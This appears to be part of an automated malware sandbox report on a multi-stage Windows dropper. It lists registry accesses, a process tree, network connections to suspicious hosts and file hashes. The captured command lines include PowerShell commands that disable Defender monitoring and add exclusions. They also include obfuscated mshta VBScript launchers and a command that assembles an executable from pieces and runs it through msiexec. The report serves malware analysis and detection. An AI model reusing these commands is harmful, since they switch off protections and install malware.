| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe
"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
Wed067fa7edd4b875a.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe
Wed06d8092a5ae.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe
Wed0639114ac9fa.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe
Wed068cfd71e196da.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe
Wed062a0488e6dd1.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe
Wed0625413f2fb.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe
Wed062272ee8a02b1746.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06384ea2548.exe
Wed06384ea2548.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe
Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp" /SL5="$401EC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4908 -ip 4908
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3712 -ip 3712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 588
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 356
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF """"=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
"C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7002E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"
C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe
05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /im "Wed062272ee8a02b1746.exe"
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h""=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h"=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT( "wScriPT.shEll" ). Run("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n " ,0, TrUe))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X+ SVnzW.C2+ AmtZY.zXT+ LPME79O.f1+ NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"
C:\Windows\SysWOW64\msiexec.exe
msiexec -y .\M9WDkH25.n
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mooorni.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| N/A | 127.0.0.1:53164 | tcp | |
| N/A | 127.0.0.1:53166 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 72.84.118.132:8080 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.37.61.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | bc10ee7cbbf3ea8b505c94bd655f5e50 |
| SHA1 | 4667e7d52e54ba83ee7c264c14171a4db0d1c444 |
| SHA256 | 33ea6a4e83204a0798a7a4e6d3361618e171d37342ed1b16d33b504eafb3b111 |
| SHA512 | a1e2349e226e83fa041ca5ade434927c5ca2a7f4c3f322944cce829c7ae5aa47376b7a9825618d3393668751baa3b45be55c749625344764a2532e92a167815f |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe
| MD5 | 35799316b448a835e4784fbdd26b5648 |
| SHA1 | fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5 |
| SHA256 | 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0 |
| SHA512 | ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660 |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/4908-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4908-77-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4908-76-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4908-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4908-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1784-78-0x0000000004AD0000-0x0000000004B06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe
| MD5 | cf1ef22fba3b8080deab8dd3ec2dbe79 |
| SHA1 | 62c57835497002d7f760fabb77969281b4ccf3e0 |
| SHA256 | 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0 |
| SHA512 | 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe
| MD5 | 508251b34a5ea5271e6c8d365b3623d2 |
| SHA1 | a6f057ba3154fca2a2000cbb7ee9c171c682a8ac |
| SHA256 | a111e371822094423c652cef67b75663d97e7d7a18c33213d745a1f2075d210f |
| SHA512 | 981e33ee2c1d699304165d7d96af3de99509b7dc0ce6f7a3e49c763f58ae4227f1d60056997adc366de9203d86d469de3062542b2ba147303848d6e4d26bf170 |
memory/3816-93-0x0000000006160000-0x00000000061C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
memory/3816-91-0x0000000005980000-0x00000000059A2000-memory.dmp
memory/3816-113-0x0000000006240000-0x0000000006594000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhtdin5l.1lz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2508-107-0x00000000001C0000-0x00000000001D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06384ea2548.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
